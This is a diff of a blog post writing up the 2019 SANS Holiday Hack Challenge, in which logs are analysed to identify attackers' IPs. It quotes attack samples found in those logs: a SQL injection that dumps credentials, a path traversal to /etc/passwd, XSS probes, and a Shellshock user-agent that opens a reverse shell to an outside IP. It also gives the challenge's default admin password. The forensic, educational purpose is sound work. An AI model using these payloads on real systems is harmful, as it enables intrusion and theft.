mfred488/mfred488.github.io/_posts/2020-01-14-2019-SANS-holiday-hack-challenge-write-up.markdown

 # IP used multiple times: 228.145.238.81
 {% endhighlight %}

 Wow!
 Only 2 IPs are used several times!
-If we look at the activity of the first IPs, you'll see that the first request is a GET to `/README.md`.
+If we look at the activity of the first IP, we'll see that the first request is a GET to `/README.md`.
 This might ring a bell if you've carefully read the quick-start guide decrypted 2 challenges ago.
 In this file, we could read:

 > The default login credentials should be changed on startup and can be found in the readme in the ElfU Research Labs git repository

 The [readme file](https://srf.elfu.org/README.md) read by `42.103.246.130` is indeed the file mentioned in the quick-start guide, and of course the default login credentials are still valid!
-We can now log into the [Sleigh Route Finder Admin Console]((https://srf.elfu.org/) using the default login/password admin/924158F9522B3744F5FCD4D10FAC4356.
+We can now log into the [Sleigh Route Finder Admin Console](https://srf.elfu.org/) using the default login/password admin/924158F9522B3744F5FCD4D10FAC4356.

 The second step is to identify the attackers' IPs.
 We were told by Wunorse that there are (at least) four different attack methods that can be found in the logs:
 * SQL injection: we can indeed see some events with suspicious field values, such as `"uri": "/api/weather?station_id=1' UNION SELECT 0,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM xmas_users WHERE 1"`
-* Local file inclusion: similarily, we can see that some user tried access `/api/weather?station_id=\"/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd`
+* Local file inclusion: similarily, we can see that some user tried to access `/api/weather?station_id=\"/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd`
 * Cross-site scripting: the classic way to test for XSS flaws is to use the browser's [`alert`](https://developer.mozilla.org/en-US/docs/Web/API/Window/alert) function; and indeed, we can see a request sent to `/logout?id=<script>alert(1400620032)</script>&ref_a=avdsscanning\\\"><script>alert(1536286186)</script>`
 * Shellshock: we can also spot the infamous Shellshock payload `() { :; };` in a couple of requests; for instance, the one sent with user-agent `() { :; }; /bin/bash -i >& /dev/tcp/31.254.228.4/48051 0>&1`

-So we indeed found some examples for each of these attack.
-Let's now try to scan all the logs, and apply some easy heuristics to identify the IP that have been used to send an attack.
+So we indeed found some examples for each of these attacks.
+Let's now try to scan all the logs, and apply some easy heuristics to identify the IPs that have been used to send an attack.
 It's important not to look only at the field `uri`, but to look at all fields: most of the fields from zeek logs are extracted from client-controlled fields of the HTTP request, and we can expect attackers to try to inject malicious payload in any client-controlled field.

 {% highlight python %}
 import json